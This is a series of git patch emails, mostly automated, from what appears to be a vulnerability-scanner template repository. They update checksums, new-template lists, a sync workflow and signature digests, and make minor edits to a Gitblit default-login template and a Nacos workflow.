http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -4069,7 +4070,7 @@ http/exposed-panels/fortinet/fortiweb-panel.yaml:b93efd955e84caf58e7b429c2c701e2 http/exposed-panels/fortinet/fortiwlm-panel.yaml:58b416a82445f61efa24e56404f9f348e1772a79 http/exposed-panels/freeipa-panel.yaml:f233b371c8a4347054a55fb38ea8b4f3d381dd98 http/exposed-panels/freepbx-administration-panel.yaml:4fadc7db65bd76305a551a50c7bc2a68a373f429 -http/exposed-panels/freshrss-panel.yaml:8b77963b0ae2aee9b86ec586e0b703e1c074ba00 +http/exposed-panels/freshrss-panel.yaml:6494f09bb837e06cf0b412059811a00e5751911f http/exposed-panels/friendica-panel.yaml:29fc5876b779870b976a87cd70a46ff13944b4e7 http/exposed-panels/froxlor-management-panel.yaml:f10e7eae9a4162c559a720f3c390b9e36ac7ffb9 http/exposed-panels/ftm-manager-panel.yaml:bb2e43d32f3355c61c6cfa69b54e5c3ce7352137 @@ -5633,7 +5634,7 @@ http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb http/misconfiguration/imgproxy-unauth.yaml:17290c58c4487e0f2bb313179dcda02d62447789 http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 -http/misconfiguration/installer/adguard-installer.yaml:902662411f076dcd44d3c917f2b4c1b0f0e25aea +http/misconfiguration/installer/adguard-installer.yaml:66612bee293e2e8dde969a4466ff29b7d1275607 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a http/misconfiguration/installer/ampache-music-installer.yaml:e47cca91cb31625a8c216ae6a4a69bb6fc9e8cd0 @@ -8892,7 +8893,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5074602f9197e25e64b289424058eedf85de979a +templates-checksum.txt:d55d0cab8426722cd82eead84ff84d6db7c7157d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 14025a3cfce5c239886a921c4df9284ce5418351 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:10:48 +0000 Subject: [PATCH 1370/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ad5d6ba03c..6ad8ca29a4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' + - 'http/cves/2024/CVE-2024-34257.yaml' - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' From 4a9e3e37b2ec6910c2aacf4f57934c083f449858 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:11:40 +0000 Subject: [PATCH 1372/1841] Auto Template Signing [Thu Jul 18 06:11:40 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34257.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-34257.yaml b/http/cves/2024/CVE-2024-34257.yaml index 16774241e6..60d080c09a 100644 --- a/http/cves/2024/CVE-2024-34257.yaml +++ b/http/cves/2024/CVE-2024-34257.yaml @@ -56,3 +56,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022055626dc912a0f417ae790a1b7f990a2b3cf95e22f8ba964c7d032fbee8b697f502200ec6da65f291cccddaaac0b9998cdeb9cc8179b2115e8bcad0d49d15c815f7fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4621359bff260033fe77f1821df7c4b3503b050b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:11:43 +0000 Subject: [PATCH 1373/1841] Auto Generated Templates Checksum [Thu Jul 18 06:11:43 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b4b586236c..809054c1a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5338,7 +5338,7 @@ http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb http/fuzzing/cache-poisoning-fuzz.yaml:948f78ead7ac4fcd626851773d3e92a5d34e074f http/fuzzing/header-command-injection.yaml:f126838d620d2991c09240ce267478409d12ae19 -http/fuzzing/iis-shortname.yaml:6fcd0689bd05133e0ee0e70291469662df9afa2e +http/fuzzing/iis-shortname.yaml:9d661e4eb4e10d77a906b48ce487b58eae21a13e http/fuzzing/linux-lfi-fuzzing.yaml:18a1e5d45eb60e189b788f1059d390abdfcc000a http/fuzzing/mdb-database-file.yaml:7e47955452e3de00c6db4c1eb36d12625bbf444b http/fuzzing/prestashop-module-fuzz.yaml:9b53a0dddc072c19a9bb504142a7405e29883dc6 @@ -8893,7 +8893,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d55d0cab8426722cd82eead84ff84d6db7c7157d +templates-checksum.txt:1e67ea16ca08e6361ff07f9840dbe610cf1d50ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8b0445359521c8eddb159f737ee3fccbe3d22e39 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:12:15 +0000 Subject: [PATCH 1374/1841] Auto Generated New Template Addition List [Thu Jul 18 06:12:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2c9075791d..8e77f64d02 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/exposures/files/adcs-certificate.yaml +http/misconfiguration/freshrss-unauth.yaml http/misconfiguration/installer/adguard-installer.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml From c7711c83dfad5f3ad4b5131e65eee80940597829 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:12:20 +0000 Subject: [PATCH 1375/1841] Auto Generated Templates Checksum [Thu Jul 18 06:12:20 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 809054c1a5..b40a137cfc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,7 +3474,7 @@ http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b -http/cves/2024/CVE-2024-34257.yaml:9019e4541ac061628afcfa02b0304295ec1935a4 +http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 @@ -5587,6 +5587,7 @@ http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092c http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 http/misconfiguration/forgejo-repo-exposure.yaml:488bb40106fd98d7dae36f0e21f19eb9daade0a0 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 +http/misconfiguration/freshrss-unauth.yaml:c8fee17da3eab3dd947b5c1676e7cd04c60be742 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc http/misconfiguration/ganglia-cluster-dashboard.yaml:f08a3e1c593d51e030d3d0960a344332336967e3 @@ -8893,7 +8894,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1e67ea16ca08e6361ff07f9840dbe610cf1d50ce +templates-checksum.txt:eebf68828759aeef735dba6766051e0df1d29f3b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 795a62034de06ba425fc373d7c0999289f77c477 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 11:42:37 +0530 Subject: [PATCH 1376/1841] Update and rename http/default-logins/gitblit-default-login.yaml to http/default-logins/gitblit/gitblit-default-login.yaml --- http/default-logins/{ => gitblit}/gitblit-default-login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename http/default-logins/{ => gitblit}/gitblit-default-login.yaml (90%) diff --git a/http/default-logins/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml similarity index 90% rename from http/default-logins/gitblit-default-login.yaml rename to http/default-logins/gitblit/gitblit-default-login.yaml index 99de815a05..b4ea2b6b9a 100644 --- a/http/default-logins/gitblit-default-login.yaml +++ b/http/default-logins/gitblit/gitblit-default-login.yaml @@ -4,14 +4,15 @@ info: name: Gitblit - Default Login author: ritikchaddha severity: high - description: Gitblit Default login credentials were discovered. + description: | + Gitblit Default login credentials were discovered. reference: - https://www.gitblit.com/administration.html metadata: max-request: 1 verified: true shodan-query: title:"Gitblit" - tags: gitblit,misconfig,default-login + tags: gitblit,default-login http: - raw: From 0def66ad940fcb3e21f025b303e89ae072a02731 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:13:07 +0000 Subject: [PATCH 1377/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6ad8ca29a4..378707552a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/exposures/files/adcs-certificate.yaml' + - 'http/misconfiguration/freshrss-unauth.yaml' - 'http/misconfiguration/installer/adguard-installer.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' From bf0d04cc5330c577902fa225f4078893da214479 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:14:04 +0000 Subject: [PATCH 1378/1841] Auto Template Signing [Thu Jul 18 06:14:04 UTC 2024] :robot: --- http/fuzzing/iis-shortname.yaml | 2 +- http/misconfiguration/freshrss-unauth.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 4eeddded2c..04e0569483 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" -# digest: 4a0a0047304502203ead208e8734bc93932ce5161465801e18f3df07bb3e0a9d5b4ffd6f5dc8fa36022100b6781d0b7f1c1e6e5215899614f159a1546c8839d4a8005211f7684550070bfd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a2de5291583da5b7fa25fe90575a3504fb914937f396a714d3f21c2b07cef98022100f8ee240024bf508d7a77ad3b65d03baa00750f1c5c8432738081d75586aa18d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml index 6f240e5cb8..6696dc5d10 100644 --- a/http/misconfiguration/freshrss-unauth.yaml +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dc6be883a55c3a37721506155b1565010f1158fd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 11:45:07 +0530 Subject: [PATCH 1379/1841] formatting --- workflows/nacos-workflow.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/workflows/nacos-workflow.yaml b/workflows/nacos-workflow.yaml index 6a7ba31971..53457b50f6 100644 --- a/workflows/nacos-workflow.yaml +++ b/workflows/nacos-workflow.yaml @@ -3,7 +3,9 @@ id: nacos-workflow info: name: Nacos Security Checks author: Co5mos - description: A simple workflow that runs all Nacos related nuclei templates on a given target. + description: | + A simple workflow that runs all Nacos related nuclei templates on a given target. + workflows: - template: http/technologies/nacos-version.yaml subtemplates: From 4de549c034984fa470c86ce6f2dc61d2ab7e6175 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:15:44 +0000 Subject: [PATCH 1380/1841] Auto Generated New Template Addition List [Thu Jul 18 06:15:44 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8e77f64d02..e08b54089a 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml http/cves/2024/CVE-2024-6646.yaml +http/default-logins/gitblit/gitblit-default-login.yaml http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml From faf70b8bb41adddd295fb5299c3da5080e90dcd3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:15:56 +0000 Subject: [PATCH 1381/1841] Auto Generated Templates Checksum [Thu Jul 18 06:15:56 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b40a137cfc..0c30c17da8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3581,6 +3581,7 @@ http/default-logins/franklin-fueling-default-login.yaml:49d5c8cf093e8d8af30d355d http/default-logins/frps/frp-default-login.yaml:058cf43e920ef4d804f4285f55bf3d9ee69dc9a7 http/default-logins/fuelcms/fuelcms-default-login.yaml:0b4d5eb309b21c12dfb96b09fecdc5aaeb645d4d http/default-logins/geoserver/geoserver-default-login.yaml:8dc4ab620a08bae7856256d201465b1fb0411b18 +http/default-logins/gitblit/gitblit-default-login.yaml:14e1dfee7c13946bba72e9cf020f901106447b84 http/default-logins/gitlab/gitlab-weak-login.yaml:f81685731ba26b91137744dccb03f4a2867f5eef http/default-logins/glpi/glpi-default-login.yaml:3ed70cd4c1fd3b0c7688f9fc6ffe9c0b3414829e http/default-logins/goip-default-login.yaml:7cfb944af1d88cf1b85de2d3517af441f6d45196 @@ -5338,7 +5339,7 @@ http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb http/fuzzing/cache-poisoning-fuzz.yaml:948f78ead7ac4fcd626851773d3e92a5d34e074f http/fuzzing/header-command-injection.yaml:f126838d620d2991c09240ce267478409d12ae19 -http/fuzzing/iis-shortname.yaml:9d661e4eb4e10d77a906b48ce487b58eae21a13e +http/fuzzing/iis-shortname.yaml:0c40c248b38ad6b1b65f32a51fbda8729bd7e909 http/fuzzing/linux-lfi-fuzzing.yaml:18a1e5d45eb60e189b788f1059d390abdfcc000a http/fuzzing/mdb-database-file.yaml:7e47955452e3de00c6db4c1eb36d12625bbf444b http/fuzzing/prestashop-module-fuzz.yaml:9b53a0dddc072c19a9bb504142a7405e29883dc6 @@ -5587,7 +5588,7 @@ http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092c http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 http/misconfiguration/forgejo-repo-exposure.yaml:488bb40106fd98d7dae36f0e21f19eb9daade0a0 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 -http/misconfiguration/freshrss-unauth.yaml:c8fee17da3eab3dd947b5c1676e7cd04c60be742 +http/misconfiguration/freshrss-unauth.yaml:c84c6ca317fc6b314e7a1fe332e1f633e3557d90 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc http/misconfiguration/ganglia-cluster-dashboard.yaml:f08a3e1c593d51e030d3d0960a344332336967e3 @@ -8894,7 +8895,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eebf68828759aeef735dba6766051e0df1d29f3b +templates-checksum.txt:1bead95a4bf44189d89058455b820cb3cdec71ea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bda8198599007f7e707effa2e0512ba19466473d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:16:32 +0000 Subject: [PATCH 1382/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 378707552a..b6c82733fa 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -19,6 +19,7 @@ on: - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/cves/2024/CVE-2024-6646.yaml' + - 'http/default-logins/gitblit/gitblit-default-login.yaml' - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' From aa8e7185889ba67d4a0fcab592cd0adc5e27d56b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:16:52 +0000 Subject: [PATCH 1383/1841] Auto Generated New Template Addition List [Thu Jul 18 06:16:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e08b54089a..4e6ce5045f 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml +http/cves/2024/CVE-2024-32238.yaml http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml From 6ad9d8496fd67040034facdba854351f8fc6d4da Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:16:58 +0000 Subject: [PATCH 1384/1841] Auto Generated Templates Checksum [Thu Jul 18 06:16:58 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0c30c17da8..4e50885d53 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3460,6 +3460,7 @@ http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 http/cves/2024/CVE-2024-31982.yaml:1c2a20bde3daf605c529fd67b5538084d7cf0f5b http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 +http/cves/2024/CVE-2024-32238.yaml:bb0dc9c34e200c8c3ee0351e66cd6fad5da57522 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c @@ -8895,7 +8896,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1bead95a4bf44189d89058455b820cb3cdec71ea +templates-checksum.txt:2b50f0c4249886b1b9c0112159a87195ae0ba74a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d07f1c0e2b1693d2de9ec76174a3582e51cc34fc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:17:32 +0000 Subject: [PATCH 1385/1841] Auto Generated New Template Addition List [Thu Jul 18 06:17:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4e6ce5045f..bc841ae5db 100644 --- a/.new-additions +++ b/.new-additions @@ -30,3 +30,4 @@ http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +network/cves/2024/CVE-2024-6746.yaml From 7095fe8257fa5049c8887e5f4675a4c5745339c3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:17:37 +0000 Subject: [PATCH 1386/1841] Auto Generated Templates Checksum [Thu Jul 18 06:17:37 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4e50885d53..b6ba5e0c81 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8736,6 +8736,7 @@ network/cves/2022/CVE-2022-0543.yaml:cc5abf652c0eeb64ce1c6e9ceca8fb13142c812e network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 +network/cves/2024/CVE-2024-6746.yaml:0fa73ba53f6333c092af9029d12800a5e2b5d4a6 network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 network/default-login/ftp-weak-credentials.yaml:6706b4c1e7c6209ba1e25289fc1286ea4a85484a network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 @@ -8896,7 +8897,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2b50f0c4249886b1b9c0112159a87195ae0ba74a +templates-checksum.txt:69b84028735127f4a680ff4a0e06ec8164d43ad9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 53d46b58fc04bbc5f7cc724fdba344794d811788 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:17:41 +0000 Subject: [PATCH 1387/1841] Auto Template Signing [Thu Jul 18 06:17:41 UTC 2024] :robot: --- http/default-logins/gitblit/gitblit-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/gitblit/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml index b4ea2b6b9a..171313a7d6 100644 --- a/http/default-logins/gitblit/gitblit-default-login.yaml +++ b/http/default-logins/gitblit/gitblit-default-login.yaml @@ -46,3 +46,4 @@ http: - type: dsl dsl: - "len(body) == 0" +# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 292f493a8c5df78eb1103b53398139b47cdce5ca Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:17:43 +0000 Subject: [PATCH 1388/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b6c82733fa..ac979f1d72 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' + - 'http/cves/2024/CVE-2024-32238.yaml' - 'http/cves/2024/CVE-2024-34257.yaml' - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' From c67157e8170bc27da8f786b8aaad9edd3ff52160 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:18:20 +0000 Subject: [PATCH 1389/1841] Auto Generated New Template Addition List [Thu Jul 18 06:18:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bc841ae5db..dbb6cb7b71 100644 --- a/.new-additions +++ b/.new-additions @@ -31,3 +31,4 @@ http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml network/cves/2024/CVE-2024-6746.yaml +workflows/nacos-workflow.yaml From dc42de0d98adecbb29b2b37c70319fc48603d017 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:18:29 +0000 Subject: [PATCH 1390/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ac979f1d72..0172690522 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -35,6 +35,7 @@ on: - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 